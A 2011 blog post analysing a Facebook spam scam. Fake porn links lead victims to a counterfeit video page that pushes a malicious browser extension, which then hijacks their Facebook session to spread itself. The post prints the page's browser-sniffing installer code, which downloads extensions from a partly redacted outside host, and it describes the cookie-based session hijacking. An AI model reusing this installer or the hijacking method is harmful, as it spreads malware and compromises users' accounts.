December 21, 2011 · Facebook Scam

Facebook Porn Scam Attack: The Complete Story

Facebook users are being targeted under a heavy spam attack.Spam in Facebook is not uncommon though but this time every 2 out of 10 profile reportedly contain those spammed links (pretend to show Porn) and uses very attractive subject-lines like - this is really hot prakhar, Look now! hahaha. Now in this blog post I will tell the complete episode, how those links are spreading and how to get protected from such attacks.

First of all the spam starts with a wall post which claims to be porn.

Now when the user opens the link in the hope of viewing porn, he/she lands into a malicious website which is designed to look like Facebook's video page and it is filled entirely with fake comments and likes . Then the user is asked to install a DivX plugin to view the video.

The plugin website is very intelligent, it contains code to detect which browser the user is running and it will load a malicious plugin for that browser see the following JavaScript code grabbed from the page.

var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;  
var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;

function instalar() {  
    if (is_chrome) {
        window.open("http://tmz[removed].com/youtube.crx");
    } else if (is_firefox) {
        var params = {
            "Youtube Extension": {
                URL: "http://tmz[removed].com/youtube.xpi",
                toString: function() {
                    return this.URL;
                }
            }
        };
        InstallTrigger.install(params);
    } else {
        window.open("");
    }
}

From the above code it is crystal clear that if the browser is Google Chrome it will load extension "youtube.crx" and if the browser is Mozilla Firefox it will load a plugin "youtube.xpi".The loading and installation of plugin is shown below

After installation of the malicious plugin in the browser, whenever the user navigates to facebook.com the plugin secretly tries to load and execute a JavaScript file from an external address http://tmz[removed].com/script.js. This JS file runs in the browser and uses the logged-in facebook user's cookie (which the plugin fetches actually) to gain a temporary access to the users' account (session hijacking) then it starts to get the friends list (using XHR Requests) and starts to post the links into user's friends' wall.

The spamming routine comes to an end with spam link getting circulated to multiple friends of the user and the cycle continues.To my surprise none of the 43 Anti-Viruses in VirusTotal.com detected those malicious plugins.

To get yourselves protected from such attacks read these:

http://facecrooks.com/Scam-Watch/The-Ultimate-Guide-to-Facebook-Scams.html
http://facecrooks.com/Scam-Watch/Top-Ten-Facebook-Scams-to-Avoid.html
http://facecrooks.com/Internet-Safety-Privacy/6-things-you-need-to-do-right-now-to-prepare-for-the-new-facebook-timeline.html

If you have any question(s) to ask please post/comment below.